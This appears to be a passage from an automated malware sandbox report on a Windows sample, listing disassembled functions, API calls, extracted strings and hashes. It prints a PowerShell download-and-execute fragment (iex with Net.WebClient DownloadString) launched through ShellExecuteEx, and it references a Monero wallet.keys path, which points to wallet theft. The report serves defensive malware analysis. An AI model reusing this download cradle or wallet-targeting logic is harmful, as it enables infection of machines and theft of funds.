                                          • Part of subcall function 007CACC0: lstrcpy.KERNEL32(00000000), ref: 007CAD14
                                          • Part of subcall function 007CACC0: lstrcat.KERNEL32(00000000,00000000), ref: 007CAD22
                                          • Part of subcall function 007CAC30: lstrcpy.KERNEL32(00000000,?), ref: 007CAC82
                                          • Part of subcall function 007CAC30: lstrcat.KERNEL32(00000000), ref: 007CAC92
                                          • Part of subcall function 007CABB0: lstrcpy.KERNEL32(?,007D0E1A), ref: 007CAC15
                                        • ShellExecuteEx.SHELL32(0000003C), ref: 007C2FD5
                                        Strings
                                        • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 007C2F14
                                        • ')", xrefs: 007C2F03
                                        • <, xrefs: 007C2F89
                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 007C2F54
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                                        • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        • API String ID: 3031569214-898575020
                                        • Opcode ID: b52db8f17ceb69c03c0bce590d0609147d714027796d4176f4750e879a82b134
                                        • Instruction ID: 5c7f9554fe956aba5f091d477407059d1f205bc10d34336d9227f7e2768a6925
                                        • Opcode Fuzzy Hash: b52db8f17ceb69c03c0bce590d0609147d714027796d4176f4750e879a82b134
                                        • Instruction Fuzzy Hash: 96410EB1D1020CEADB14FFA0C86AFDDBB79AF10305F40445DE10666192DF786A49CF91
                                        Function 007C4300 Relevance: 7.6, APIs: 5, Instructions: 124registrystringCOMMON
                                        Download Yara Rule
                                        APIs
                                        • RegOpenKeyExA.ADVAPI32(80000001,0165D8A0,00000000,00020119,?), ref: 007C4344
                                        • RegQueryValueExA.ADVAPI32(?,0165ED00,00000000,00000000,00000000,000000FF), ref: 007C4368
                                        • RegCloseKey.ADVAPI32(?), ref: 007C4372
                                        • lstrcat.KERNEL32(?,00000000), ref: 007C4397
                                        • lstrcat.KERNEL32(?,0165EBB0), ref: 007C43AB
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$CloseOpenQueryValue
                                        • String ID:
                                        • API String ID: 690832082-0
                                        • Opcode ID: 8014fa2350dda92b22d82856f2814c069e6f2426e2ce6ad105e8fb1df85fda2c
                                        • Instruction ID: 7fc0c812557c4e4862c6699324c011492717c9ba19ebfb839681b1cb53266cc9
                                        • Opcode Fuzzy Hash: 8014fa2350dda92b22d82856f2814c069e6f2426e2ce6ad105e8fb1df85fda2c
                                        • Instruction Fuzzy Hash: 3C418CB6900108ABDB24EBE0EC9AFEE737CAB88700F40455CB71557181EE7597898BE1
                                        Function 0082CBE2 Relevance: 7.6, APIs: 5, Instructions: 87COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: dllmain_raw$dllmain_crt_dispatch
                                        • String ID:
                                        • API String ID: 3136044242-0
                                        • Opcode ID: 234a4587e1df5c0bc1ce5882952f099010f88dbe2dfa5d5717c242a90a4fec11
                                        • Instruction ID: c8952de6ea864989b2d05088dec342e2b954ad51ca26404bec099d3883e60c98
                                        • Opcode Fuzzy Hash: 234a4587e1df5c0bc1ce5882952f099010f88dbe2dfa5d5717c242a90a4fec11
                                        • Instruction Fuzzy Hash: 01218C72D00638ABDB329F59EC41A7F3A69FB85BA4F054129F809E7211D3308DC18BE1
                                        Function 007C6BC0 Relevance: 7.6, APIs: 5, Instructions: 67timeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetSystemTime.KERNEL32(?), ref: 007C6C0C
                                        • sscanf.NTDLL ref: 007C6C39
                                        • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 007C6C52
                                        • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 007C6C60
                                        • ExitProcess.KERNEL32 ref: 007C6C7A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Time$System$File$ExitProcesssscanf
                                        • String ID:
                                        • API String ID: 2533653975-0
                                        • Opcode ID: 2525b5e46587fcc2b341a3bfb01865080524dd99ac7d071d3e96e7b3a46d631a
                                        • Instruction ID: 4bcae163483474987397689f41bae9f9f921999f6c34565442f96d611c21dca0
                                        • Opcode Fuzzy Hash: 2525b5e46587fcc2b341a3bfb01865080524dd99ac7d071d3e96e7b3a46d631a
                                        • Instruction Fuzzy Hash: 7121CD75D14208ABCF14DFE4E885EEEB7B5BF48300F14852DE516A3250EB349604CB65
                                        Function 007C7F90 Relevance: 7.6, APIs: 5, Instructions: 58registrymemoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 007C7FC7
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 007C7FCE
                                        • RegOpenKeyExA.ADVAPI32(80000002,0164B7F8,00000000,00020119,?), ref: 007C7FEE
                                        • RegQueryValueExA.ADVAPI32(?,0165DB40,00000000,00000000,000000FF,000000FF), ref: 007C800F
                                        • RegCloseKey.ADVAPI32(?), ref: 007C8022
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                        • String ID:
                                        • API String ID: 3225020163-0
                                        • Opcode ID: fd3ff9c0dae2790719b9d0483b8a25e81d0d95615155a5c37ceab16b4cedbe7f
                                        • Instruction ID: 09f532e424543c725da2ba1dde3cd42daf7d447dc8faf045c8dd494fc4581900
                                        • Opcode Fuzzy Hash: fd3ff9c0dae2790719b9d0483b8a25e81d0d95615155a5c37ceab16b4cedbe7f
                                        • Instruction Fuzzy Hash: F2114FB1A44205ABD700CBD4DD49FAFBB78EB44B10F10421DF615A7290E77999018BA1
                                        Function 007C93F0 Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 41stringCOMMON
                                        Download Yara Rule
                                        APIs
                                        • StrStrA.SHLWAPI(0165ED30,00000000,00000000,?,007B9F71,00000000,0165ED30,00000000), ref: 007C93FC
                                        • lstrcpyn.KERNEL32(00A87580,0165ED30,0165ED30,?,007B9F71,00000000,0165ED30), ref: 007C9420
                                        • lstrlen.KERNEL32(00000000,?,007B9F71,00000000,0165ED30), ref: 007C9437
                                        • wsprintfA.USER32 ref: 007C9457
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpynlstrlenwsprintf
                                        • String ID: %s%s
                                        • API String ID: 1206339513-3252725368
                                        • Opcode ID: f1c512d591492977edaf2d0d96e8831030c3ce3ba77be9bb59f04c5cc880867d
                                        • Instruction ID: 8e9972a3f2074eb4bf91fbbd08ad806777de7ed10cd858237f0dff7bde4b3cac
                                        • Opcode Fuzzy Hash: f1c512d591492977edaf2d0d96e8831030c3ce3ba77be9bb59f04c5cc880867d
                                        • Instruction Fuzzy Hash: 0301DA75504108FFCB08DFA8C988EAE7BB8EB48304F208648F9199B654D735EA51DB90
                                        Function 007B12A0 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 007B12B4
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 007B12BB
                                        • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 007B12D7
                                        • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 007B12F5
                                        • RegCloseKey.ADVAPI32(?), ref: 007B12FF
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                        • String ID:
                                        • API String ID: 3225020163-0
                                        • Opcode ID: e6cd1c3f595c6150f80139131537a209928ec450a406dfc972a11e7f4e319bbd
                                        • Instruction ID: a1fbba6884bdd198ef643a73a940eaeb28991f9bc290ad17e3d1cf06f8f4c9c5
                                        • Opcode Fuzzy Hash: e6cd1c3f595c6150f80139131537a209928ec450a406dfc972a11e7f4e319bbd
                                        • Instruction Fuzzy Hash: D401E179A44209BFDB04DFD4DC89FEEB778EB48701F104195FA1597290EB74DA018B90
                                        Function 007CCB7E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 129COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: String___crt$Type
                                        • String ID:
                                        • API String ID: 2109742289-3916222277
                                        • Opcode ID: f1f576fb6381658de0b998c511a845b82e49221a42cde3c1cf1177859d556d6b
                                        • Instruction ID: 533376c1657d815f4721ecdd08369ac4ac7c49fbacfe8e984802e28ac112145a
                                        • Opcode Fuzzy Hash: f1f576fb6381658de0b998c511a845b82e49221a42cde3c1cf1177859d556d6b
                                        • Instruction Fuzzy Hash: 2B41E6B010079C9EDB328B24CD95FFBBBEC9B45704F1444ECE98E96142E2759E459F60
                                        Function 007C68D0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 007C6903
                                          • Part of subcall function 007CAA50: lstrcpy.KERNEL32(007D0E1A,00000000), ref: 007CAA98
                                          • Part of subcall function 007CACC0: lstrlen.KERNEL32(?,016588B8,?,\Monero\wallet.keys,007D0E1A), ref: 007CACD5
                                          • Part of subcall function 007CACC0: lstrcpy.KERNEL32(00000000), ref: 007CAD14
                                          • Part of subcall function 007CACC0: lstrcat.KERNEL32(00000000,00000000), ref: 007CAD22
                                          • Part of subcall function 007CABB0: lstrcpy.KERNEL32(?,007D0E1A), ref: 007CAC15
                                        • ShellExecuteEx.SHELL32(0000003C), ref: 007C69C6
                                        • ExitProcess.KERNEL32 ref: 007C69F5
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                                        • String ID: <
                                        • API String ID: 1148417306-4251816714
                                        • Opcode ID: c3d5030219b575bafd564d992ffeabc8572ecb9f6a98976939c7ff3c566d0972
                                        • Instruction ID: f134fa05e15bb02d6647ec306795ad11db5de32d0e249b7c8d33b1f50b75da41
                                        • Opcode Fuzzy Hash: c3d5030219b575bafd564d992ffeabc8572ecb9f6a98976939c7ff3c566d0972
                                        • Instruction Fuzzy Hash: 053126F1901218EADB14EF90DC9AFDEB778AF08304F40418CF20666191DF78AA48CF69
                                        Function 007C8950 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,007D0E10,00000000,?), ref: 007C89BF
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 007C89C6
                                        • wsprintfA.USER32 ref: 007C89E0
                                          • Part of subcall function 007CAA50: lstrcpy.KERNEL32(007D0E1A,00000000), ref: 007CAA98
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmpDownload File
